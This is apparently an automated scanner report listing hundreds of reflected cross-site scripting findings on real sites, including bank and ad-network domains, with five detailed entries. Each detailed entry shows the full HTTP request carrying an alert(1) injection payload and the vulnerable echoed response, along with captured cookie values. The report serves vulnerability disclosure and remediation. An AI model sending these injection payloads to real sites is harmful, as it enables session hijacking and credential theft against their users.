1.328. http://servedby.flashtalking.com/imp/3/16303 [ftadz parameter]

1.329. http://servedby.flashtalking.com/imp/3/16303 [ftscw parameter]

1.330. http://servedby.flashtalking.com/imp/3/16303 [ftx parameter]

1.331. http://servedby.flashtalking.com/imp/3/16303 [fty parameter]

1.332. http://servedby.flashtalking.com/imp/3/16303 [name of an arbitrarily supplied request parameter]

1.333. http://widgets.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

1.334. http://widgets.macroaxis.com/widgets/url.jsp [t parameter]

1.335. http://www-open-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

1.336. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]

1.337. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]

1.338. http://www.addthis.com/favicon.ico [REST URL parameter 1]

1.339. http://www.addthis.com/favicon.ico [REST URL parameter 1]

1.340. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]

1.341. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]

1.342. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]

1.343. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]

1.344. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]

1.345. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]

1.346. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]

1.347. http://www.bankofamerica.com/onlinebanking/enroll.cfm [REST URL parameter 1]

1.348. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]

1.349. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]

1.350. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 1]

1.351. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 2]

1.352. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 3]

1.353. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 1]

1.354. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 2]

1.355. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 3]

1.356. http://www.bankofamerica.com/small_business/business_financing/index.cfm [REST URL parameter 1]

1.357. http://www.bankofamerica.com/small_business/business_financing/index.cfm [REST URL parameter 2]

1.358. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]

1.359. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]

1.360. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]

1.361. http://www.bankofamerica.com/surveys/popup_visit.cfm [REST URL parameter 1]

1.362. http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm [REST URL parameter 1]

1.363. http://www.bankofamerica.com/surveys/survey_select.cfm [REST URL parameter 1]

1.364. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]

1.365. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]

1.366. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]

1.367. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

1.368. http://www.greencrestcapital.com/phpt/phpThumb.php [name of an arbitrarily supplied request parameter]

1.369. http://www.greencrestcapital.com/phpt/phpThumb.php [src parameter]

1.370. http://www.ig.gmodules.com/gadgets/ifr [url parameter]

1.371. http://www.linkedin.com/countserv/count/share [url parameter]

1.372. https://www.merrilledge.com/M/ScriptResource.axd [d parameter]

1.373. http://www.pbig.ml.com/PWA/ScriptResource.axd [d parameter]

1.374. http://www.pbig.ml.com/pwa/pages/find-a-pwa.aspx [name of an arbitrarily supplied request parameter]

1.375. http://www.totalmerrill.com/TotalMerrill/system/FABranchLocator.aspx [fatype parameter]

1.376. http://www.tumri.net/ads/mti/6565 [DFA_AdId parameter]

1.377. http://www.tumri.net/ads/mti/6565 [DFA_BuyId parameter]

1.378. http://www.tumri.net/ads/mti/6565 [DFA_Click_Tracker parameter]

1.379. http://www.tumri.net/ads/mti/6565 [DFA_CreativeId parameter]

1.380. http://www.tumri.net/ads/mti/6565 [DFA_PlacementId parameter]

1.381. http://www.tumri.net/ads/mti/6565 [DFA_SiteId parameter]

1.382. http://www.tumri.net/ads/mti/6565 [sc parameter]

1.383. http://www.tumri.net/ads/mti/6565 [x2_TC_1 parameter]

1.384. http://www.tumri.net/ads/mti/6928 [ATL_AdId parameter]

1.385. http://www.tumri.net/ads/mti/6928 [ATL_CampaignId parameter]

1.386. http://www.tumri.net/ads/mti/6928 [ATL_Click_Tracker parameter]

1.387. http://www.tumri.net/ads/mti/6928 [ATL_PlacementId parameter]

1.388. http://www.tumri.net/ads/mts/6565 [DFA_AdId parameter]

1.389. http://www.tumri.net/ads/mts/6565 [DFA_BuyId parameter]

1.390. http://www.tumri.net/ads/mts/6565 [DFA_CreativeId parameter]

1.391. http://www.tumri.net/ads/mts/6565 [DFA_PlacementId parameter]

1.392. http://www.tumri.net/ads/mts/6565 [DFA_SiteId parameter]

1.393. http://www.tumri.net/ads/mts/6565 [ac parameter]

1.394. http://www.tumri.net/ads/mts/6565 [bw parameter]

1.395. http://www.tumri.net/ads/mts/6565 [city parameter]

1.396. http://www.tumri.net/ads/mts/6565 [ct parameter]

1.397. http://www.tumri.net/ads/mts/6565 [dma parameter]

1.398. http://www.tumri.net/ads/mts/6565 [name of an arbitrarily supplied request parameter]

1.399. http://www.tumri.net/ads/mts/6565 [redirect parameter]

1.400. http://www.tumri.net/ads/mts/6565 [st parameter]

1.401. http://www.tumri.net/ads/mts/6565 [x2_TC_1 parameter]

1.402. http://www.tumri.net/ads/mts/6565 [zp parameter]

1.403. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.404. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

1.405. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

1.406. https://my.scoutanalytics.com/ptmrg/authenticate.aspx [Referer HTTP header]

1.407. http://www.bankofamerica.com/surveys/popup_visit.cfm [Referer HTTP header]

1.408. http://www.bankofamerica.com/surveys/popup_visit.cfm [User-Agent HTTP header]

1.409. http://www.tumri.net/ads/mti/6565 [Referer HTTP header]

1.410. http://www.tumri.net/ads/mti/6928 [Referer HTTP header]

1.411. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=61790 [NGUserID cookie]

1.412. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=2902&qcseg=291&qcseg=446&qcseg=232&qcseg=250&qcseg=249&qcseg=2900&qcseg=1758&bizo_ind=business_services&bizo_func=it_systems_analysts&bizo_sen=executive&tile=1309224167493&page.allowcompete=yes&domId=528442 [NGUserID cookie]

1.413. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=260693 [NGUserID cookie]

1.414. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.415. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news¶ms.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=84066 [NGUserID cookie]

1.416. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=383053 [NGUserID cookie]

1.417. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.418. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

1.419. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.420. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.421. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]

1.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]

1.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]

1.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie]

1.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p104939219 cookie]

1.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]

1.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]

1.429. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

1.430. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

1.431. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

1.432. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.433. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]

1.434. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

1.435. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

1.436. http://ar.voicefive.com/bmx3/broker.pli [ar_p97126803 cookie]

1.437. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

1.438. http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie]

1.439. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]

1.440. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p97126803 cookie]

1.441. https://my.scoutanalytics.com/ptmrg/authenticate.aspx [ASP.NET_SessionId cookie]

1.442. https://onlineeast2.bankofamerica.com/cgi-bin/ias/0/E/EnrollEntryPoint [BOA_0020 cookie]

1.443. http://www.bankofamerica.com/cferror.cgi [state cookie]

1.444. http://www.bankofamerica.com/findit/error.cgi [state cookie]

1.445. http://www.bankofamerica.com/surveys/flyout/HM_Arrays.js [state cookie]

1.446. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]

1.447. http://www.bankofamerica.com/www/global/mvc_objects/images/1pixel_clear.gif [state cookie]



1. Cross-site scripting (reflected)
There are 447 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.netmng.com/hic/ [click parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8baf"><script>alert(1)</script>75e5e999f56 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_creative=8149&nm_width=300&nm_height=250&nm_publ=210&nm_c=AAABMNPbJXBiPl4xeDk5CVA-G1pxx4vWqvILNg&beacon=oxrtb&url=www.marketbuy54.com&rnd=764280935&click=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3DIAwG0I_-iShr9GoJMAGn3aE7xBg6SbfsGj30FuXd3wwH4M6bjKoyqA0NlMMIpKaNYmOxkiQ16R6n10TfGedjaN5Ue2HiLpWqLStZLJ0ks8W0rByOcQEeP48r3OfvcYN7vrEDFJiiqnMAAAA%3D%26dst%3Db8baf"><script>alert(1)</script>75e5e999f56&nb&passback&bid_time=20110627212652&nm_vid=csmq4atf04cxa&catid=306359757 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cb%2BdNiEvISQT6cyitdFbTxMeRzri7agv%2BuPX495tKoG44%2FxaJb%2BBLR2vGmewSkfT8W9wb4%2BGWmxXBKXzfaguPFwiwUvZJuE237iUkaa2neKTPvHSKU6UdIwOLgG0pJYrBDvZXX6%2FrKXP0pcUwLBH7isq7VBHcvJFp%2BBtr7d7A%2F4G9xdgi4OCt%2BpLt5rlINMXH%2Fj7LVDSi0Ps9t8HmtYH%2BquXnmHK5Oh37TVuyfD%2BM9lKr4zOwzCwJWktPWl4nmVc9l%2FFl3JBYqMyagQjBDMPScscrWDac7xxm2Ka0lDkIY5OP682Y%2F%2BhNTTv93CwvjxxEWVyEOa7MPJhCW9K0B1ZjosU7ZALAsL3La8WlyNAa2wcTnGPhhe8dNNWWPM%2FhD%2B%2FgwS4PzPq%2FppfihRQny12ONimUaIlIQ%2BMYgG4N4iCH646FDZoLNhzIAvOnPmZ7IPYgqwx3Yo%2BMTg9DUH4AFxTkXFXHhBjWQBrq%2BqfMwA6DikYWq5KAsXtxiwOmFOcicbkaHYEC0%2FaXfrGsj%2Bf0uLgL0420yDAO3OLhYeZg0x0HmsDXgRycmVysglnjCWFpMYw9e86ad%2FH4uzKisOa6kWjQzXh4Y9FtwEZmtlsMH7dRRutmbXvbwFqVSwnEl2hAWlQndRmbeN48RCufnt7ycGw2ViLW1DLY2htCOkWX%2FeDvEYmbv1tn8zkyfws7DWnCRpL%2B%2FvgMwoxBRomruUCk%2BOtBBA3PR50YFG8yhstdXYja87kFF67EClPachEP0Fs5XXJy

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:26:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 26 Jun 2011 01:26:55 GMT
Last-Modified: Sun, 26 Jun 2011 01:26:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=edKRlW3O%2F9zyshhrw51bSejgfc3WLZWx6yybTIP3e%2FjyyipDRHMaQV4zGt1Mv%2Bkjf9KxSBL2NuyezYb3J9F7kQ%3D%3D; expires=Thu, 02-Jun-44591 01:26:55 GMT; path=/; domain=.netmng.com
Content-Length: 1634
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5527925.2;sz=300x250;click=;ord=1309224415;click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLzQ3DIAwG0I_-iShr9GoJMAGn3aE7xBg6SbfsGj30FuXd3
...[SNIP]...
k=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLzQ3DIAwG0I_-iShr9GoJMAGn3aE7xBg6SbfsGj30FuXd3wwH4M6bjKoyqA0NlMMIpKaNYmOxkiQ16R6n10TfGedjaN5Ue2HiLpWqLStZLJ0ks8W0rByOcQEeP48r3OfvcYN7vrEDFJiiqnMAAAA=&dst=b8baf"><script>alert(1)</script>75e5e999f56;?">
...[SNIP]...

1.2. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bdac"-alert(1)-"77392b856f was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Date: Tue, 28 Jun 2011 01:29:37 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b34/f/1bc/%2a/t%3B240188907%3B0-0%3B0%3B63005625%3B4307-300/250%3B41751683/41769470/2%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0
...[SNIP]...

1.3. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2e9"-alert(1)-"dc78b75f8dd was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7401
Date: Tue, 28 Jun 2011 01:29:48 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2
...[SNIP]...

1.4. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [redirectURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5275"-alert(1)-"ac334d801d8 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6515
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 01:29:50 GMT
Expires: Tue, 28 Jun 2011 01:29:50 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8http://disneyland.disney.go.com/vacation-packages/spend-one-more-day/?CMP=BAC-DLRUSENFY11Q3DLRCTI0068");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

1.5. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17d63"-alert(1)-"0029028972a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7425
Date: Tue, 28 Jun 2011 01:29:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b34/f/1bd/%2a/w%3B240188907%3B1-0%3B0%3B63005625%3B4307-300/250%3B42010411/42028198/1%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3
...[SNIP]...

